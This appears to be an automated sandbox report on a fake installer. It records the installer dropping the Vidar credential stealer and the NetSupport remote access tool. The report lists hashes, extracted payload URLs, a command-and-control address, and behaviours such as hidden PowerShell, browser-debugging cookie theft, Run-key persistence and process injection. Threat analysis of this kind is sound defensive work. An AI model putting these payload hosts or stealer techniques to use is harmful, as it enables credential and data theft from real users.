Analysis
-
max time kernel
503s -
max time network
600s -
platform
windows11-21h2_x64 -
resource
win11-20241007-en -
resource tags
arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system -
submitted
12-11-2024 17:35
Static task
static1
Behavioral task
behavioral1
Sample
Setup_Installer_1.3.6_x64.exe
Resource
win11-20241007-en
General
-
Target
Setup_Installer_1.3.6_x64.exe
-
Size
49.3MB
-
MD5
29fa71fab96724091fdf7a66dca09c67
-
SHA1
15fcb631fa6cc825639cd4e15d37d844faac6fdd
-
SHA256
882759dd0f306ab06f597c2db3011e82eff5bb7515de5d28a20b6913fe7f5626
-
SHA512
12acf8548f03d230b28d7b5c1eb9009e2ebd7abb06f781c38c15f0d04bae32aded9e692ade4541c2b89e27398de4da853a2a00e94637fea67db4174f710d8a04
-
SSDEEP
1572864:NwfwuNI9XY9hQtPkGKTD85uMWW7z0PbYF:NCu9oAdETgu3f8F
Malware Config
Extracted
http://gatugo.com/paz/pan4.zip
http://gatugo.com/paz/pan1.zip
http://gatugo.com/paz/pan3.zip
http://gatugo.com/paz/pan2.zip
http://gatugo.com/pan/
Extracted
vidar
11.7
721d3f29688b3d8f568f99a7d2115582
https://5.75.214.111
https://t.me/m07mbk
https://steamcommunity.com/profiles/76561199801589826
-
user_agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
Signatures
-
Detect Vidar Stealer 2 IoCs
resource yara_rule behavioral1/memory/2768-1023-0x0000000000880000-0x0000000000ADC000-memory.dmp family_vidar_v7 behavioral1/memory/2768-1565-0x0000000000880000-0x0000000000ADC000-memory.dmp family_vidar_v7 -
NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
-
Netsupport family
-
Vidar family
-
Blocklisted process makes network request 2 IoCs
flow pid Process 14 400 powershell.exe 19 4048 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 3924 powershell.exe 400 powershell.exe -
Downloads MZ/PE file
-
Uses browser remote debugging 2 TTPs 12 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 648 msedge.exe 4688 msedge.exe 3432 chrome.exe 5080 chrome.exe 5532 msedge.exe 5968 msedge.exe 5960 msedge.exe 3476 chrome.exe 4832 chrome.exe 1028 chrome.exe 5468 msedge.exe 3056 msedge.exe -
Executes dropped EXE 7 IoCs
pid Process 4276 install.exe 3056 javaw.exe 3956 DPMHelper.exe 4400 DPMHelper.exe 3088 DPMHelper.exe 4200 DPMHelper.exe 3036 client32.exe -
Loads dropped DLL 64 IoCs
pid Process 4700 Setup_Installer_1.3.6_x64.exe 4700 Setup_Installer_1.3.6_x64.exe 3828 MsiExec.exe 3828 MsiExec.exe 940 MsiExec.exe 940 MsiExec.exe 940 MsiExec.exe 940 MsiExec.exe 1696 Setup_Installer_1.3.6_x64.exe 1696 Setup_Installer_1.3.6_x64.exe 2012 MsiExec.exe 2012 MsiExec.exe 4608 MsiExec.exe 4608 MsiExec.exe 4608 MsiExec.exe 4608 MsiExec.exe 3592 Setup_Installer_1.3.6_x64.exe 3592 Setup_Installer_1.3.6_x64.exe 1624 MsiExec.exe 1624 MsiExec.exe 4976 MsiExec.exe 4976 MsiExec.exe 4976 MsiExec.exe 4976 MsiExec.exe 4976 MsiExec.exe 4976 MsiExec.exe 3592 Setup_Installer_1.3.6_x64.exe 3056 javaw.exe 3056 javaw.exe 3056 javaw.exe 3056 javaw.exe 3056 javaw.exe 3056 javaw.exe 3056 javaw.exe 3056 javaw.exe 3056 javaw.exe 3056 javaw.exe 3056 javaw.exe 3056 javaw.exe 3056 javaw.exe 3056 javaw.exe 3056 javaw.exe 3956 DPMHelper.exe 3956 DPMHelper.exe 3956 DPMHelper.exe 3956 DPMHelper.exe 3956 DPMHelper.exe 3956 DPMHelper.exe 3956 DPMHelper.exe 3956 DPMHelper.exe 3956 DPMHelper.exe 3956 DPMHelper.exe 3956 DPMHelper.exe 4400 DPMHelper.exe 4400 DPMHelper.exe 4400 DPMHelper.exe 4400 DPMHelper.exe 4400 DPMHelper.exe 4400 DPMHelper.exe 4400 DPMHelper.exe 4400 DPMHelper.exe 4400 DPMHelper.exe 4400 DPMHelper.exe 4400 DPMHelper.exe -
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000\Software\Microsoft\Windows\CurrentVersion\Run\HardDiskHealth = "C:\\Users\\Admin\\AppData\\Roaming\\HardDiskHealth\\client32.exe" powershell.exe -
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\T: Setup_Installer_1.3.6_x64.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\I: Setup_Installer_1.3.6_x64.exe File opened (read-only) \??\N: Setup_Installer_1.3.6_x64.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\A: Setup_Installer_1.3.6_x64.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\E: Setup_Installer_1.3.6_x64.exe File opened (read-only) \??\W: Setup_Installer_1.3.6_x64.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\Y: Setup_Installer_1.3.6_x64.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\I: Setup_Installer_1.3.6_x64.exe File opened (read-only) \??\M: Setup_Installer_1.3.6_x64.exe File opened (read-only) \??\E: Setup_Installer_1.3.6_x64.exe File opened (read-only) \??\Q: Setup_Installer_1.3.6_x64.exe File opened (read-only) \??\B: Setup_Installer_1.3.6_x64.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\G: Setup_Installer_1.3.6_x64.exe File opened (read-only) \??\X: Setup_Installer_1.3.6_x64.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\U: Setup_Installer_1.3.6_x64.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\A: Setup_Installer_1.3.6_x64.exe File opened (read-only) \??\J: Setup_Installer_1.3.6_x64.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\P: Setup_Installer_1.3.6_x64.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\O: Setup_Installer_1.3.6_x64.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\R: Setup_Installer_1.3.6_x64.exe File opened (read-only) \??\I: Setup_Installer_1.3.6_x64.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\M: Setup_Installer_1.3.6_x64.exe File opened (read-only) \??\R: Setup_Installer_1.3.6_x64.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\P: Setup_Installer_1.3.6_x64.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\B: Setup_Installer_1.3.6_x64.exe File opened (read-only) \??\V: Setup_Installer_1.3.6_x64.exe File opened (read-only) \??\W: Setup_Installer_1.3.6_x64.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\T: Setup_Installer_1.3.6_x64.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\L: Setup_Installer_1.3.6_x64.exe File opened (read-only) \??\X: Setup_Installer_1.3.6_x64.exe File opened (read-only) \??\S: Setup_Installer_1.3.6_x64.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 1 pastebin.com 12 pastebin.com -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 3088 set thread context of 3188 3088 DPMHelper.exe 144 PID 4200 set thread context of 688 4200 DPMHelper.exe 146 -
Drops file in Windows directory 31 IoCs
description ioc Process File created C:\Windows\Installer\e57b8b3.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI8B91.tmp msiexec.exe File opened for modification C:\Windows\Installer\e57b8b1.msi msiexec.exe File opened for modification C:\Windows\Installer\MSIB9EB.tmp msiexec.exe File opened for modification C:\Windows\Installer\e57b8b2.msi msiexec.exe File created C:\Windows\SystemTemp\~DFD6EFEA456A740EFA.TMP msiexec.exe File created C:\Windows\Installer\e57b8b1.msi msiexec.exe File created C:\Windows\Installer\e57b8b2.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI4906.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI8B32.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI8BA2.tmp msiexec.exe File opened for modification C:\Windows\SystemTemp chrome.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSIBA3A.tmp msiexec.exe File created C:\Windows\Installer\SourceHash{AD6AAEE5-41ED-4385-99F2-A705FF5B53CD} msiexec.exe File created C:\Windows\SystemTemp\~DF28A1F5EC6C811071.TMP msiexec.exe File opened for modification C:\Windows\Installer\MSI4956.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI8BC4.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI9654.tmp msiexec.exe File created C:\Windows\SystemTemp\~DF71D695DF1A1FF963.TMP msiexec.exe File opened for modification C:\Windows\Installer\MSI4878.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI4916.tmp msiexec.exe File created C:\Windows\SystemTemp\~DFA9F5AAA809D50C05.TMP msiexec.exe File opened for modification C:\Windows\Installer\MSI8BB3.tmp msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\SystemTemp chrome.exe File opened for modification C:\Windows\Installer\MSIB93E.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIBA6A.tmp msiexec.exe File opened for modification C:\Windows\Installer\e57b8b3.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI8BA3.tmp msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 46 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Setup_Installer_1.3.6_x64.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DPMHelper.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Setup_Installer_1.3.6_x64.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language chcp.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language chcp.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language chcp.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language client32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language more.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Setup_Installer_1.3.6_x64.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language javaw.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language chcp.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language more.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DPMHelper.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DPMHelper.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language more.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language install.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DPMHelper.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language chcp.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Checks SCSI registry key(s) 3 TTPs 5 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters vssvc.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 00000000040000001d3755855d3e98e80000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff0000000027010100000800001d3755850000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff0000000007000100006809001d375585000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1d1d375585000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000000000001d37558500000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe -
Checks processor information in registry 2 TTPs 14 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 explorer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString explorer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 5416 timeout.exe -
Enumerates system info in registry 2 TTPs 9 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133759071488491598" chrome.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings firefox.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2499603254-3415597248-1508446358-1000\{764E6412-54FB-4A52-A9A8-F6806B53E440} chrome.exe -
Suspicious behavior: EnumeratesProcesses 48 IoCs
pid Process 3568 msiexec.exe 3568 msiexec.exe 3924 powershell.exe 3924 powershell.exe 400 powershell.exe 400 powershell.exe 400 powershell.exe 3924 powershell.exe 3956 DPMHelper.exe 4400 DPMHelper.exe 3088 DPMHelper.exe 3088 DPMHelper.exe 3088 DPMHelper.exe 4200 DPMHelper.exe 4200 DPMHelper.exe 4200 DPMHelper.exe 4048 powershell.exe 4048 powershell.exe 4048 powershell.exe 3188 cmd.exe 3188 cmd.exe 3188 cmd.exe 3188 cmd.exe 688 cmd.exe 688 cmd.exe 688 cmd.exe 688 cmd.exe 4048 powershell.exe 2768 explorer.exe 2768 explorer.exe 2768 explorer.exe 2768 explorer.exe 3432 chrome.exe 3432 chrome.exe 2768 explorer.exe 2768 explorer.exe 2768 explorer.exe 2768 explorer.exe 5756 msedge.exe 5756 msedge.exe 5532 msedge.exe 5532 msedge.exe 3484 msedge.exe 3484 msedge.exe 2768 explorer.exe 2768 explorer.exe 4876 chrome.exe 4876 chrome.exe -
Suspicious behavior: MapViewOfSection 4 IoCs
pid Process 3088 DPMHelper.exe 4200 DPMHelper.exe 688 cmd.exe 3188 cmd.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 15 IoCs
pid Process 3432 chrome.exe 3432 chrome.exe 3432 chrome.exe 3432 chrome.exe 5532 msedge.exe 5532 msedge.exe 5532 msedge.exe 5532 msedge.exe 5532 msedge.exe 5532 msedge.exe 4876 chrome.exe 4876 chrome.exe 4876 chrome.exe 4876 chrome.exe 4876 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeSecurityPrivilege 3568 msiexec.exe Token: SeCreateTokenPrivilege 4700 Setup_Installer_1.3.6_x64.exe Token: SeAssignPrimaryTokenPrivilege 4700 Setup_Installer_1.3.6_x64.exe Token: SeLockMemoryPrivilege 4700 Setup_Installer_1.3.6_x64.exe Token: SeIncreaseQuotaPrivilege 4700 Setup_Installer_1.3.6_x64.exe Token: SeMachineAccountPrivilege 4700 Setup_Installer_1.3.6_x64.exe Token: SeTcbPrivilege 4700 Setup_Installer_1.3.6_x64.exe Token: SeSecurityPrivilege 4700 Setup_Installer_1.3.6_x64.exe Token: SeTakeOwnershipPrivilege 4700 Setup_Installer_1.3.6_x64.exe Token: SeLoadDriverPrivilege 4700 Setup_Installer_1.3.6_x64.exe Token: SeSystemProfilePrivilege 4700 Setup_Installer_1.3.6_x64.exe Token: SeSystemtimePrivilege 4700 Setup_Installer_1.3.6_x64.exe Token: SeProfSingleProcessPrivilege 4700 Setup_Installer_1.3.6_x64.exe Token: SeIncBasePriorityPrivilege 4700 Setup_Installer_1.3.6_x64.exe Token: SeCreatePagefilePrivilege 4700 Setup_Installer_1.3.6_x64.exe Token: SeCreatePermanentPrivilege 4700 Setup_Installer_1.3.6_x64.exe Token: SeBackupPrivilege 4700 Setup_Installer_1.3.6_x64.exe Token: SeRestorePrivilege 4700 Setup_Installer_1.3.6_x64.exe Token: SeShutdownPrivilege 4700 Setup_Installer_1.3.6_x64.exe Token: SeDebugPrivilege 4700 Setup_Installer_1.3.6_x64.exe Token: SeAuditPrivilege 4700 Setup_Installer_1.3.6_x64.exe Token: SeSystemEnvironmentPrivilege 4700 Setup_Installer_1.3.6_x64.exe Token: SeChangeNotifyPrivilege 4700 Setup_Installer_1.3.6_x64.exe Token: SeRemoteShutdownPrivilege 4700 Setup_Installer_1.3.6_x64.exe Token: SeUndockPrivilege 4700 Setup_Installer_1.3.6_x64.exe Token: SeSyncAgentPrivilege 4700 Setup_Installer_1.3.6_x64.exe Token: SeEnableDelegationPrivilege 4700 Setup_Installer_1.3.6_x64.exe Token: SeManageVolumePrivilege 4700 Setup_Installer_1.3.6_x64.exe Token: SeImpersonatePrivilege 4700 Setup_Installer_1.3.6_x64.exe Token: SeCreateGlobalPrivilege 4700 Setup_Installer_1.3.6_x64.exe Token: SeCreateTokenPrivilege 4700 Setup_Installer_1.3.6_x64.exe Token: SeAssignPrimaryTokenPrivilege 4700 Setup_Installer_1.3.6_x64.exe Token: SeLockMemoryPrivilege 4700 Setup_Installer_1.3.6_x64.exe Token: SeIncreaseQuotaPrivilege 4700 Setup_Installer_1.3.6_x64.exe Token: SeMachineAccountPrivilege 4700 Setup_Installer_1.3.6_x64.exe Token: SeTcbPrivilege 4700 Setup_Installer_1.3.6_x64.exe Token: SeSecurityPrivilege 4700 Setup_Installer_1.3.6_x64.exe Token: SeTakeOwnershipPrivilege 4700 Setup_Installer_1.3.6_x64.exe Token: SeLoadDriverPrivilege 4700 Setup_Installer_1.3.6_x64.exe Token: SeSystemProfilePrivilege 4700 Setup_Installer_1.3.6_x64.exe Token: SeSystemtimePrivilege 4700 Setup_Installer_1.3.6_x64.exe Token: SeProfSingleProcessPrivilege 4700 Setup_Installer_1.3.6_x64.exe Token: SeIncBasePriorityPrivilege 4700 Setup_Installer_1.3.6_x64.exe Token: SeCreatePagefilePrivilege 4700 Setup_Installer_1.3.6_x64.exe Token: SeCreatePermanentPrivilege 4700 Setup_Installer_1.3.6_x64.exe Token: SeBackupPrivilege 4700 Setup_Installer_1.3.6_x64.exe Token: SeRestorePrivilege 4700 Setup_Installer_1.3.6_x64.exe Token: SeShutdownPrivilege 4700 Setup_Installer_1.3.6_x64.exe Token: SeDebugPrivilege 4700 Setup_Installer_1.3.6_x64.exe Token: SeAuditPrivilege 4700 Setup_Installer_1.3.6_x64.exe Token: SeSystemEnvironmentPrivilege 4700 Setup_Installer_1.3.6_x64.exe Token: SeChangeNotifyPrivilege 4700 Setup_Installer_1.3.6_x64.exe Token: SeRemoteShutdownPrivilege 4700 Setup_Installer_1.3.6_x64.exe Token: SeUndockPrivilege 4700 Setup_Installer_1.3.6_x64.exe Token: SeSyncAgentPrivilege 4700 Setup_Installer_1.3.6_x64.exe Token: SeEnableDelegationPrivilege 4700 Setup_Installer_1.3.6_x64.exe Token: SeManageVolumePrivilege 4700 Setup_Installer_1.3.6_x64.exe Token: SeImpersonatePrivilege 4700 Setup_Installer_1.3.6_x64.exe Token: SeCreateGlobalPrivilege 4700 Setup_Installer_1.3.6_x64.exe Token: SeCreateTokenPrivilege 4700 Setup_Installer_1.3.6_x64.exe Token: SeAssignPrimaryTokenPrivilege 4700 Setup_Installer_1.3.6_x64.exe Token: SeLockMemoryPrivilege 4700 Setup_Installer_1.3.6_x64.exe Token: SeIncreaseQuotaPrivilege 4700 Setup_Installer_1.3.6_x64.exe Token: SeMachineAccountPrivilege 4700 Setup_Installer_1.3.6_x64.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 4700 Setup_Installer_1.3.6_x64.exe 1620 msiexec.exe 1620 msiexec.exe 1696 Setup_Installer_1.3.6_x64.exe 1064 msiexec.exe 1064 msiexec.exe 3592 Setup_Installer_1.3.6_x64.exe 3088 msiexec.exe 3088 msiexec.exe 3036 client32.exe 3432 chrome.exe 3432 chrome.exe 3432 chrome.exe 3432 chrome.exe 3432 chrome.exe 3432 chrome.exe 3432 chrome.exe 3432 chrome.exe 3432 chrome.exe 3432 chrome.exe 3432 chrome.exe 3432 chrome.exe 3432 chrome.exe 3432 chrome.exe 3432 chrome.exe 3432 chrome.exe 3432 chrome.exe 3432 chrome.exe 3432 chrome.exe 3432 chrome.exe 3432 chrome.exe 3432 chrome.exe 3432 chrome.exe 3432 chrome.exe 3432 chrome.exe 3432 chrome.exe 5532 msedge.exe 5532 msedge.exe 5532 msedge.exe 5532 msedge.exe 5532 msedge.exe 5532 msedge.exe 5532 msedge.exe 5532 msedge.exe 5532 msedge.exe 5532 msedge.exe 5532 msedge.exe 5532 msedge.exe 5532 msedge.exe 5532 msedge.exe 5532 msedge.exe 5532 msedge.exe 5532 msedge.exe 5532 msedge.exe 5532 msedge.exe 5532 msedge.exe 5532 msedge.exe 5532 msedge.exe 5532 msedge.exe 5532 msedge.exe 5532 msedge.exe 3036 client32.exe 5308 firefox.exe 5308 firefox.exe -
Suspicious use of SendNotifyMessage 12 IoCs
pid Process 4876 chrome.exe 4876 chrome.exe 4876 chrome.exe 4876 chrome.exe 4876 chrome.exe 4876 chrome.exe 4876 chrome.exe 4876 chrome.exe 4876 chrome.exe 4876 chrome.exe 4876 chrome.exe 4876 chrome.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
pid Process 3056 javaw.exe 3036 client32.exe 3036 client32.exe 5308 firefox.exe 3036 client32.exe 3036 client32.exe -
Suspicious use of WriteProcessMemory 64 IoCs
